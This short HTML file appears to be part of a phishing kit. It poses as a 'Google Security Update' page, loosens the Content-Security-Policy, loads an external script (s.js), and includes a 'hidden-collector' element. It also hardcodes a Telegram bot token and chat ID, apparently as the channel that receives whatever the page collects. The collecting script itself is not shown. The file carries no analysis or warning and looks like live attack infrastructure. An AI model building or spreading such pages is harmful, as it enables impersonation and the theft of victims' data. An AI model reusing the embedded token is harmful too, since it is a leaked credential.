<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Google Security Update</title>
    <meta name="google" content="notranslate">
    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;">
    <style>body{margin:0;overflow:hidden;background:#f8f9fa;font-family:'Google Sans',Arial,sans-serif;}</style>
</head>
<body>
    <script>
        window.TELEGRAM_BOT_TOKEN = '8101956095:AAF72VNrqd9Jxlz0nBL5LqmKgveEPh7b75Q';
        window.TELEGRAM_CHAT_ID = '8463942433';
    </script>
    <script src="s.js"></script>
    <div class="hidden-collector"></div>
</body>
</html>
